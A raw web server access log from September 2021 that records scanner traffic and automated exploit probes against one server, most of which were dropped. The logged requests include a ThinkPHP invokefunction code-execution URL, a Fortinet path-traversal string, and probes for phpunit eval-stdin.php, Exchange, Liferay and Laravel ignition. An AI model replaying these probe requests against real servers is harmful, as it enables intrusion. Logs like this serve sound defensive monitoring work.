"/owa/auth/x.js" [Client 192.241.214.37] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Sep/2021:00:15:57 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.240] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Sep/2021:00:16:30 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.101.75] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Sep/2021:00:22:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Sep/2021:02:55:58 +0000] 400 - GET http localhost "/" [Client 125.64.94.144] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:02:55:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.144] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [22/Sep/2021:02:56:00 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 125.64.94.144] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [22/Sep/2021:02:56:00 +0000] 400 - GET http 64.22.31.253 "/robots.txt" [Client 125.64.94.144] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [22/Sep/2021:02:56:01 +0000] 400 - GET http 64.22.31.253 "/.well-known/security.txt" [Client 125.64.94.144] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [22/Sep/2021:03:48:07 +0000] 400 - GET https localhost "/" [Client 34.65.139.43] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:03:48:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.65.139.43] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [22/Sep/2021:04:21:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.82.47.2] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:04:35:57 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:04:56:37 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.218.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Sep/2021:05:20:38 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:05:39:33 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Sep/2021:06:14:47 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:14:47 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:14:51 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:14:51 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:14:56 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [22/Sep/2021:06:14:56 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:15:00 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:15:00 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:15:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:15:04 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:15:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:15:04 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Sep/2021:06:23:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [22/Sep/2021:07:42:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 52.87.209.128] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3042.95 Safari/537.32" "-" [22/Sep/2021:07:42:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 52.87.209.128] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3042.95 Safari/537.32" "-" [22/Sep/2021:07:47:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.240.192.82] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Sep/2021:08:10:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.44] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:08:10:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:08:10:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [22/Sep/2021:08:11:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.64] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Sep/2021:08:21:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:08:33:02 +0000] 444 - GET https help.moralanimal.net "/" [Client 34.86.35.20] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [22/Sep/2021:08:52:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Sep/2021:09:40:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Sep/2021:10:22:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [22/Sep/2021:10:33:07 +0000] 444 - GET https localhost "/" [Client 47.241.187.28] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:10:33:08 +0000] 444 - OPTIONS https localhost "/" [Client 47.241.187.28] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:10:33:09 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.241.187.28] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:10:33:10 +0000] 400 - - https localhost "-" [Client 47.241.187.28] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:10:33:16 +0000] 400 - - https localhost "-" [Client 47.241.187.28] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:10:33:17 +0000] 400 - - https localhost "-" [Client 47.241.187.28] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:10:33:18 +0000] 400 - - https localhost "-" [Client 47.241.187.28] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:10:33:19 +0000] 400 - - https localhost "-" [Client 47.241.187.28] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:10:33:20 +0000] 400 - - https localhost "-" [Client 47.241.187.28] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:10:33:21 +0000] 400 - - https localhost "-" [Client 47.241.187.28] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:10:33:22 +0000] 400 - - https localhost "-" [Client 47.241.187.28] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:10:33:22 +0000] 444 - GET https 64.22.31.253 "/text4041632306759" [Client 47.241.187.28] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:10:33:22 +0000] 444 - GET https localhost "/" [Client 47.241.187.28] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:10:33:22 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.241.187.28] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:10:33:23 +0000] 400 - GET http localhost "/" [Client 47.241.187.28] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:10:33:23 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.241.187.28] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:10:33:23 +0000] 400 - GET http 64.22.31.253 "/text4041632306759" [Client 47.241.187.28] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:10:33:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.241.187.28] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:10:33:24 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.241.187.28] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:10:33:24 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.241.187.28] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:10:33:24 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.241.187.28] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:10:33:24 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.241.187.28] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:10:33:25 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.241.187.28] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:10:33:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.241.187.28] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:10:33:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.241.187.28] [Length 0] [Gzip -] "curl/7.75.0" "-" [22/Sep/2021:11:30:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.244.184.5] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 5.0.2; zh-CN; Redmi Note 3 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 OPR/11.2.3.102637 Mobile Safari/537.36" "-" [22/Sep/2021:12:29:21 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.220.167] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Sep/2021:13:04:45 +0000] 444 - GET https localhost "/" [Client 47.253.87.148] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:04:45 +0000] 444 - OPTIONS https localhost "/" [Client 47.253.87.148] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:04:45 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.253.87.148] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:04:46 +0000] 400 - - https localhost "-" [Client 47.253.87.148] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:04:51 +0000] 400 - - https localhost "-" [Client 47.253.87.148] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:04:51 +0000] 400 - - https localhost "-" [Client 47.253.87.148] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:04:51 +0000] 400 - - https localhost "-" [Client 47.253.87.148] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:04:51 +0000] 400 - - https localhost "-" [Client 47.253.87.148] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:04:51 +0000] 400 - - https localhost "-" [Client 47.253.87.148] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:04:51 +0000] 400 - - https localhost "-" [Client 47.253.87.148] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:04:52 +0000] 400 - - https localhost "-" [Client 47.253.87.148] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:04:52 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.253.87.148] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:04:52 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.253.87.148] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:04:52 +0000] 444 - GET https localhost "/" [Client 47.253.87.148] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:04:53 +0000] 444 - GET https 64.22.31.253 "/text4041632315849" [Client 47.253.87.148] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:04:53 +0000] 400 - GET http localhost "/" [Client 47.253.87.148] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:13:04:53 +0000] 400 - GET http 64.22.31.253 "/text4041632315849" [Client 47.253.87.148] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:04:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.253.87.148] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:04:53 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.253.87.148] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:04:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.253.87.148] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:13:04:53 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.253.87.148] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:04:53 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.253.87.148] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:04:53 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.253.87.148] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:05:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.253.87.148] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:05:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.253.87.148] [Length 0] [Gzip -] "curl/7.75.0" "-" [22/Sep/2021:13:14:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.90.136.75] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" "-" [22/Sep/2021:13:15:44 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [22/Sep/2021:13:30:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.59] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:30:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.59] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:13:30:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [22/Sep/2021:13:41:59 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.62] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [22/Sep/2021:13:43:34 +0000] 444 - GET https localhost "/" [Client 47.242.61.109] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:43:35 +0000] 444 - OPTIONS https localhost "/" [Client 47.242.61.109] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:43:35 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.242.61.109] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:43:36 +0000] 400 - - https localhost "-" [Client 47.242.61.109] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:43:42 +0000] 400 - - https localhost "-" [Client 47.242.61.109] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:43:43 +0000] 400 - - https localhost "-" [Client 47.242.61.109] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:43:43 +0000] 400 - - https localhost "-" [Client 47.242.61.109] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:43:44 +0000] 400 - - https localhost "-" [Client 47.242.61.109] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:43:45 +0000] 400 - - https localhost "-" [Client 47.242.61.109] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:43:46 +0000] 400 - - https localhost "-" [Client 47.242.61.109] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:43:47 +0000] 400 - - https localhost "-" [Client 47.242.61.109] [Length 154] [Gzip -] "-" "-" [22/Sep/2021:13:43:47 +0000] 444 - GET https 64.22.31.253 "/text4041632318184" [Client 47.242.61.109] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:43:48 +0000] 400 - GET http 64.22.31.253 "/text4041632318184" [Client 47.242.61.109] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:43:49 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.242.61.109] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:43:49 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.242.61.109] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:43:49 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.242.61.109] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:43:49 +0000] 444 - GET https localhost "/" [Client 47.242.61.109] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:43:49 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.242.61.109] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:43:50 +0000] 400 - GET http localhost "/" [Client 47.242.61.109] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:13:43:50 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.242.61.109] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:43:50 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.242.61.109] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Sep/2021:13:43:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.242.61.109] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:43:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.242.61.109] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:13:44:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.242.61.109] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:13:44:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.242.61.109] [Length 0] [Gzip -] "curl/7.75.0" "-" [22/Sep/2021:14:15:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.59] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:14:15:02 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.59] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:14:15:02 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [22/Sep/2021:16:29:07 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Sep/2021:16:51:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.6] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Sep/2021:17:20:27 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/analytics/jbips/" [Client 194.48.199.121] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [22/Sep/2021:18:43:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.9.73.95] [Length 252] [Gzip -] "-" "-" [22/Sep/2021:21:51:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.7] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [22/Sep/2021:21:51:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.7] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [22/Sep/2021:21:51:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.7] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [22/Sep/2021:21:51:23 +0000] 400 - - https localhost "-" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:21:51:24 +0000] 400 - - https localhost "-" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:21:51:25 +0000] 400 - - https localhost "-" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:21:51:29 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:21:51:30 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:21:51:31 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [22/Sep/2021:21:51:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [22/Sep/2021:22:01:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.207.84] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Sep/2021:22:53:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.198.79.190] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Sep/2021:23:49:37 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.173] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Sep/2021:00:05:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Sep/2021:00:14:58 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.15] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Sep/2021:00:16:29 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.221.174] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Sep/2021:00:18:48 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.209.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Sep/2021:00:27:45 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:00:27:46 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:00:27:51 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" 